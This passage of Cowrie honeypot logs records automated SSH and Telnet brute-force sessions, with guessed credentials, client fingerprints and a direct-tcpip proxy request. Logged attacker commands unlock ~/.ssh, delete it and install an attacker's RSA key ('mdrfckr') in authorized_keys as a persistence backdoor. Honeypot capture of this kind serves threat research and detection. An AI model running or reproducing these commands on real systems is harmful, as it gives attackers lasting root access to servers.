@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:47:57.695784Z","src_ip":"143.198.195.7","session":"75e19935f379"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:47:58.481996Z","src_ip":"143.198.195.7","session":"75e19935f379"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:58.669299Z","src_ip":"143.198.195.7","session":"75e19935f379"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:58.671007Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"Welcome1","message":"login attempt [hammer/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T03:47:58.905934Z","src_ip":"220.248.35.196","session":"8569947e5e92"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:48:00.233130Z","src_ip":"220.248.35.196","session":"8569947e5e92"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":46198,"dst_ip":"1.2.3.4","dst_port":22,"session":"27cac0c534bf","protocol":"ssh","message":"New connection: 211.22.25.164:46198 (1.2.3.4:22) [session: 27cac0c534bf]","sensor":"my-vps","timestamp":"2025-09-09T03:48:27.059724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:48:27.060453Z","src_ip":"211.22.25.164","session":"27cac0c534bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:48:27.300692Z","src_ip":"211.22.25.164","session":"27cac0c534bf"}
{"eventid":"cowrie.login.failed","username":"kevin","password":"kevin123","message":"login attempt [kevin/kevin123] failed","sensor":"my-vps","timestamp":"2025-09-09T03:48:28.301533Z","src_ip":"211.22.25.164","session":"27cac0c534bf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:48:29.544492Z","src_ip":"211.22.25.164","session":"27cac0c534bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45533,"dst_ip":"1.2.3.4","dst_port":23,"session":"8abc6e875a7d","protocol":"telnet","message":"New connection: 212.227.235.229:45533 (1.2.3.4:23) [session: 8abc6e875a7d]","sensor":"my-vps","timestamp":"2025-09-09T03:49:10.244570Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37368,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c1133be0553","protocol":"ssh","message":"New connection: 212.227.235.229:37368 (1.2.3.4:22) [session: 3c1133be0553]","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.181237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.182208Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.342443Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51882,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f5437aae7b","protocol":"ssh","message":"New connection: 212.227.125.160:51882 (1.2.3.4:22) [session: 52f5437aae7b]","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.412057Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.413136Z","src_ip":"212.227.125.160","session":"52f5437aae7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52116,"dst_ip":"1.2.3.4","dst_port":22,"session":"93bae497f145","protocol":"ssh","message":"New connection: 212.227.125.160:52116 (1.2.3.4:22) [session: 93bae497f145]","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.525264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.526292Z","src_ip":"212.227.125.160","session":"93bae497f145"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.640574Z","src_ip":"212.227.125.160","session":"93bae497f145"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:49:15.981926Z","src_ip":"212.227.125.160","session":"93bae497f145"}
{"eventid":"cowrie.login.success","username":"root","password":"1@xsw2","message":"login attempt [root/1@xsw2] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.024318Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.096023Z","session":"93bae497f145"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:49:16.399268Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.399986Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.400903Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.562310Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:49:16.940747Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:49:16.941462Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:49:17.104234Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:17.105129Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39406,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d652b8ee019","protocol":"ssh","message":"New connection: 212.227.235.229:39406 (1.2.3.4:22) [session: 4d652b8ee019]","sensor":"my-vps","timestamp":"2025-09-09T03:49:17.262155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:49:17.262821Z","src_ip":"212.227.235.229","session":"4d652b8ee019"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:49:17.422526Z","src_ip":"212.227.235.229","session":"4d652b8ee019"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:49:18.100470Z","src_ip":"212.227.235.229","session":"4d652b8ee019"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:19.262543Z","src_ip":"212.227.235.229","session":"4d652b8ee019"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39416,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7bdda1fbde","protocol":"ssh","message":"New connection: 212.227.235.229:39416 (1.2.3.4:22) [session: 0c7bdda1fbde]","sensor":"my-vps","timestamp":"2025-09-09T03:49:19.423143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:49:19.424423Z","src_ip":"212.227.235.229","session":"0c7bdda1fbde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:49:19.585119Z","src_ip":"212.227.235.229","session":"0c7bdda1fbde"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:49:20.268995Z","src_ip":"212.227.235.229","session":"0c7bdda1fbde"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:20.431257Z","src_ip":"212.227.235.229","session":"3c1133be0553"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:20.432355Z","src_ip":"212.227.235.229","session":"0c7bdda1fbde"}
{"eventid":"cowrie.session.closed","duration":31.249736309051514,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:41.494234Z","src_ip":"212.227.235.229","session":"8abc6e875a7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54242,"dst_ip":"1.2.3.4","dst_port":23,"session":"2108975d8cb1","protocol":"telnet","message":"New connection: 212.227.235.229:54242 (1.2.3.4:23) [session: 2108975d8cb1]","sensor":"my-vps","timestamp":"2025-09-09T03:49:41.666280Z"}
{"eventid":"cowrie.session.closed","duration":13.075076341629028,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:49:54.741294Z","src_ip":"212.227.235.229","session":"2108975d8cb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51722,"dst_ip":"1.2.3.4","dst_port":22,"session":"13ee4c037833","protocol":"ssh","message":"New connection: 212.227.235.229:51722 (1.2.3.4:22) [session: 13ee4c037833]","sensor":"my-vps","timestamp":"2025-09-09T03:50:24.163607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:24.164593Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:24.394053Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq12345","message":"login attempt [root/Qq12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:50:25.353394Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:25.525965Z","src_ip":"212.227.125.160","session":"93bae497f145"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:50:25.831986Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:50:25.832644Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:50:25.833737Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:26.065116Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:50:26.625666Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:50:26.626335Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:50:26.857770Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:26.859031Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
